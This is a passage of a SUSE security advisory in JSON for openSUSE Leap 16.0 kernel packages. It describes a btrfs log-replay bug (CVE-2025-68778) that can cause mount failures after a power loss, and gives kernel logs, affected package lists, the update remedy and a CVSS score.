"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction\n\nWe can\u0027t log a conflicting inode if it\u0027s a directory and it was moved\nfrom one parent directory to another parent directory in the current\ntransaction, as this can result an attempt to have a directory with\ntwo hard links during log replay, one for the old parent directory and\nanother for the new parent directory.\n\nThe following scenario triggers that issue:\n\n1) We have directories \"dir1\" and \"dir2\" created in a past transaction.\n Directory \"dir1\" has inode A as its parent directory;\n\n2) We move \"dir1\" to some other directory;\n\n3) We create a file with the name \"dir1\" in directory inode A;\n\n4) We fsync the new file. This results in logging the inode of the new file\n and the inode for the directory \"dir1\" that was previously moved in the\n current transaction. So the log tree has the INODE_REF item for the\n new location of \"dir1\";\n\n5) We move the new file to some other directory. This results in updating\n the log tree to included the new INODE_REF for the new location of the\n file and removes the INODE_REF for the old location. This happens\n during the rename when we call btrfs_log_new_name();\n\n6) We fsync the file, and that persists the log tree changes done in the\n previous step (btrfs_log_new_name() only updates the log tree in\n memory);\n\n7) We have a power failure;\n\n8) Next time the fs is mounted, log replay happens and when processing\n the inode for directory \"dir1\" we find a new INODE_REF and add that\n link, but we don\u0027t remove the old link of the inode since we have\n not logged the old parent directory of the directory inode \"dir1\".\n\nAs a result after log replay finishes when we trigger writeback of the\nsubvolume tree\u0027s extent buffers, the tree check will detect that we have\na directory a hard link count of 2 and we get a mount failure.\nThe errors and stack traces reported in dmesg/syslog are like this:\n\n [ 3845.729764] BTRFS info (device dm-0): start tree-log replay\n [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c\n [ 3845.731236] memcg:ffff9264c02f4e00\n [ 3845.731751] aops:btree_aops [btrfs] ino:1\n [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)\n [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8\n [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00\n [ 3845.735305] page dumped because: eb page dump\n [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir\n [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5\n [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701\n [ 3845.737792] \titem 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160\n [ 3845.737794] \t\tinode generation 3 transid 9 size 16 nbytes 16384\n [ 3845.737795] \t\tblock group 0 mode 40755 links 1 uid 0 gid 0\n [ 3845.737797] \t\trdev 0 sequence 2 flags 0x0\n [ 3845.737798] \t\tatime 1764259517.0\n [ 3845.737800] \t\tctime 1764259517.572889464\n [ 3845.737801] \t\tmtime 1764259517.572889464\n [ 3845.737802] \t\totime 1764259517.0\n [ 3845.737803] \titem 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12\n [ 3845.737805] \t\tindex 0 name_len 2\n [ 3845.737807] \titem 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34\n [ 3845.737808] \t\tlocation key (257 1 0) type 2\n [ 3845.737810] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737811] \titem 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34\n [ 3845.737813] \t\tlocation key (258 1 0) type 2\n [ 3845.737814] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737815] \titem 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34\n [ 3845.737816] \t\tlocation key (257 1 0) type 2\n [\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68778",
"url": "https://www.suse.com/security/cve/CVE-2025-68778"
},
{
"category": "external",
"summary": "SUSE Bug 1256683 for CVE-2025-68778",
"url": "https://bugzilla.suse.com/1256683"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
